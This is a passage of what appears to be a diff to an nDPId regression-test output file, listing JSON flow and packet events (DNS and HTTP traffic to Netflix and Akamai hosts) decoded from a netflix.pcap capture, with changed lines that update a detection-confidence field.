{"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"art-2.nflximg.net","url":"art-2.nflximg.net\/5758c\/bb636e44b87ef854c331ed7b7b6e157e4945758c.jpg","code":0,"content_type":"","user_agent":"Argo\/9.1.0 (iPhone; iOS 10.2; Scale\/2.00)"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":668,"source":"netflix.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319043665,"flow_last_seen":1484319043665,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319043665,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.25","src_port":53150,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":668,"source":"netflix.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1484319043665,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319043665,"pkt":"gCqoTGHM5JjWH70UCABFAABAaV9AAEAGi3bAqAEHuBnMGc+eAFByPGEHAAAAALAC\/\/9NegAAAgQFtAEDAwUBAQgKH2ThCQAAAAAEAgAA"} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":669,"source":"netflix.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1484319043688,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319043688,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADwG+Lm4GcwZwKgBBwBQz57u7DQucjxhCKAScSCMigAAAgQFtAQCCAr\/\/D2rH2ThCQEDAwU="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":670,"source":"netflix.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1484319043689,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319043689,"pkt":"gCqoTGHM5JjWH70UCABFAAA0VAZAAEAGoNvAqAEHuBnMGc+eAFByPGEI7uw0L4AQEBUcSAAAAQEICh9k4SH\/\/D2r"} -00845{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":671,"source":"netflix.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319043665,"flow_last_seen":1484319043691,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":245,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1484319043691,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.25","src_port":53150,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"art-2.nflximg.net","url":"art-2.nflximg.net\/87b33\/bed1223a0040fdc97bac4e906332e462c6e87b33.jpg","code":0,"content_type":"","user_agent":"Argo\/9.1.0 (iPhone; iOS 10.2; Scale\/2.00)"}} +00845{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":671,"source":"netflix.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319043665,"flow_last_seen":1484319043691,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":245,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1484319043691,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.25","src_port":53150,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"art-2.nflximg.net","url":"art-2.nflximg.net\/87b33\/bed1223a0040fdc97bac4e906332e462c6e87b33.jpg","code":0,"content_type":"","user_agent":"Argo\/9.1.0 (iPhone; iOS 10.2; Scale\/2.00)"}} 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":703,"source":"netflix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1484319044993,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1484319044993,"pkt":"gCqoTGHM5JjWH70UCABFAAAoz5tAAEAGHmfAqAEHNBhXBs7BAbvkIOdlTYzTZlAUEACWDAAAAAAAAAAA"} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":795,"source":"netflix.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319048757,"flow_last_seen":1484319048757,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1484319048757,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":58102,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":795,"source":"netflix.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1484319048757,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1484319048757,"pkt":"gCqoTGHM5JjWH70UCABFAABBS2MAAP8R7O\/AqAEHwKgBAeL2ADUALZ5c\/mQBAAABAAAAAAAAB2FwcGJvb3QHbmV0ZmxpeANjb20AAAEAAQ=="} -00769{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":795,"source":"netflix.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319048757,"flow_last_seen":1484319048757,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1484319048757,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":58102,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"appboot.netflix.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00769{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":795,"source":"netflix.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319048757,"flow_last_seen":1484319048757,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1484319048757,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":58102,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"appboot.netflix.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00639{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":796,"source":"netflix.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1484319048776,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":192,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":192,"pkt_l4_len":158,"thread_ts_msec":1484319048776,"pkt":"5JjWH70UgCqoTGHMCABFAACy4UZAAEAR1ZvAqAEBwKgBBwA14vYAnkKZ\/mSBgAABAAUAAAAAB2FwcGJvb3QHbmV0ZmxpeANjb20AAAEAAcAMAAUAAQAAAG0ADgdhcHBib290A2dlb8AUwDEABQABAAABawAbB2FwcGJvb3QJdXMtd2VzdC0yBnByb2RhYcAUwEsAAQABAAAACwAENsm\/hMBLAAEAAQAAAAsABDQr9VrASwABAAEAAAALAAQ0GfQx"} -00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":796,"source":"netflix.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319048757,"flow_last_seen":1484319048776,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1484319048776,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":58102,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"appboot.netflix.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.201.191.132"}} +00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":796,"source":"netflix.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319048757,"flow_last_seen":1484319048776,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1484319048776,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":58102,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"appboot.netflix.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.201.191.132"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":797,"source":"netflix.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319048780,"flow_last_seen":1484319048780,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319048780,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.201.191.132","src_port":53151,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":797,"source":"netflix.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1484319048780,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319048780,"pkt":"gCqoTGHM5JjWH70UCABFAABAtrNAAEAGzAfAqAEHNsm\/hM+fAFA6e8d6AAAAALAC\/\/+ZMQAAAgQFtAEDAwUBAQgKH2T0hAAAAAAEAgAA"} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":798,"source":"netflix.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1484319048824,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319048824,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACoGmJ82yb+EwKgBBwBQz59tgW\/FOnvHe6ASRep1DwAAAgQFtAQCCApXXrqDH2T0hAEDAwg="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":799,"source":"netflix.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1484319048826,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319048826,"pkt":"gCqoTGHM5JjWH70UCABFAAA0VQxAAEAGLbvAqAEHNsm\/hM+fAFA6e8d7bYFvxoAQEBXZhAAAAQEICh9k9LFXXrqD"} -00819{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":800,"source":"netflix.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319048780,"flow_last_seen":1484319048830,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":78,"midstream":0,"thread_ts_msec":1484319048830,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.201.191.132","src_port":53151,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"appboot.netflix.com","url":"appboot.netflix.com\/appboot\/NFAPPL-02-","code":0,"content_type":"","user_agent":"Argo\/900 CFNetwork\/808.2.16 Darwin\/16.3.0"}} +00819{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":800,"source":"netflix.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319048780,"flow_last_seen":1484319048830,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":78,"midstream":0,"thread_ts_msec":1484319048830,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.201.191.132","src_port":53151,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"appboot.netflix.com","url":"appboot.netflix.com\/appboot\/NFAPPL-02-","code":0,"content_type":"","user_agent":"Argo\/900 CFNetwork\/808.2.16 Darwin\/16.3.0"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":861,"source":"netflix.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319049465,"flow_last_seen":1484319049465,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319049465,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53152,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":861,"source":"netflix.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1484319049465,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319049465,"pkt":"gCqoTGHM5JjWH70UCABFAABAjtZAAEAGjk7AqAEHNFkni8+gAFCVL\/AiAAAAALAC\/\/+toQAAAgQFtAEDAwUBAQgKH2T3IAAAAAAEAgAA"} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":863,"source":"netflix.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1484319049510,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319049510,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACoGMwk0WSeLwKgBBwBQz6CC\/YxQlS\/wI6ASRerkyQAAAgQFtAQCCAqtiNcHH2T3IAEDAwg="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":864,"source":"netflix.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1484319049516,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319049516,"pkt":"gCqoTGHM5JjWH70UCABFAAA0TN5AAEAG0FLAqAEHNFkni8+gAFCVL\/Ajgv2MUYAQEBVJOgAAAQEICh9k91KtiNcH"} -00822{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":865,"source":"netflix.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319049465,"flow_last_seen":1484319049518,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":649,"flow_tot_l4_payload_len":649,"flow_avg_l4_payload_len":162,"midstream":0,"thread_ts_msec":1484319049518,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53152,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"api-global.netflix.com","url":"api-global.netflix.com\/msl\/nrdjs\/2.1.2","code":0,"content_type":"","user_agent":"Argo\/900 CFNetwork\/808.2.16 Darwin\/16.3.0"}} -00832{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":878,"source":"netflix.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1484319049465,"flow_last_seen":1484319049580,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4993,"flow_avg_l4_payload_len":624,"midstream":0,"thread_ts_msec":1484319049580,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53152,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"api-global.netflix.com","url":"api-global.netflix.com\/msl\/nrdjs\/2.1.2","code":0,"content_type":"","user_agent":"Argo\/900 CFNetwork\/808.2.16 Darwin\/16.3.0"}} +00822{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":865,"source":"netflix.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319049465,"flow_last_seen":1484319049518,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":649,"flow_tot_l4_payload_len":649,"flow_avg_l4_payload_len":162,"midstream":0,"thread_ts_msec":1484319049518,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53152,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"api-global.netflix.com","url":"api-global.netflix.com\/msl\/nrdjs\/2.1.2","code":0,"content_type":"","user_agent":"Argo\/900 CFNetwork\/808.2.16 Darwin\/16.3.0"}} +00832{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":878,"source":"netflix.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1484319049465,"flow_last_seen":1484319049580,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4993,"flow_avg_l4_payload_len":624,"midstream":0,"thread_ts_msec":1484319049580,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53152,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"api-global.netflix.com","url":"api-global.netflix.com\/msl\/nrdjs\/2.1.2","code":0,"content_type":"","user_agent":"Argo\/900 CFNetwork\/808.2.16 Darwin\/16.3.0"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":886,"source":"netflix.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319049641,"flow_last_seen":1484319049641,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1484319049641,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51728,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":886,"source":"netflix.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1484319049641,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":80,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":80,"pkt_l4_len":46,"thread_ts_msec":1484319049641,"pkt":"gCqoTGHM5JjWH70UCABFAABCJHQAAP8RE97AqAEHwKgBAcoQADUALkrZBBoBAAABAAAAAAAABGE4MDMEZHNjZwZha2FtYWkDbmV0AAABAAE="} -00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":886,"source":"netflix.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319049641,"flow_last_seen":1484319049641,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1484319049641,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51728,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"a803.dscg.akamai.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":886,"source":"netflix.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319049641,"flow_last_seen":1484319049641,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1484319049641,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51728,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"a803.dscg.akamai.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":887,"source":"netflix.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319049645,"flow_last_seen":1484319049645,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1484319049645,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52347,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":887,"source":"netflix.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1484319049645,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":80,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":80,"pkt_l4_len":46,"thread_ts_msec":1484319049645,"pkt":"gCqoTGHM5JjWH70UCABFAABCunsAAEARPNfAqAEHwKgBAcx7ADUALmwlX+cBAAABAAAAAAAAA2lvcwRuY2NwB25ldGZsaXgDY29tAAAcAAE="} -00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":887,"source":"netflix.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319049645,"flow_last_seen":1484319049645,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1484319049645,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52347,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ios.nccp.netflix.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":887,"source":"netflix.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319049645,"flow_last_seen":1484319049645,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1484319049645,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52347,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ios.nccp.netflix.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00532{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":891,"source":"netflix.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1484319049665,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":112,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":112,"pkt_l4_len":78,"thread_ts_msec":1484319049665,"pkt":"5JjWH70UgCqoTGHMCABFAABi4UdAAEAR1erAqAEBwKgBBwA1yhAATkFkBBqBgAABAAIAAAAABGE4MDMEZHNjZwZha2FtYWkDbmV0AAABAAHADAABAAEAAAAMAAS4GcwYwAwAAQABAAAADAAEuBnMKA=="} -00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":891,"source":"netflix.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319049641,"flow_last_seen":1484319049665,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":108,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1484319049665,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51728,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"a803.dscg.akamai.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"184.25.204.24"}} +00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":891,"source":"netflix.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319049641,"flow_last_seen":1484319049665,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":108,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1484319049665,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51728,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"a803.dscg.akamai.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"184.25.204.24"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":895,"source":"netflix.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319049672,"flow_last_seen":1484319049672,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319049672,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.24","src_port":53153,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 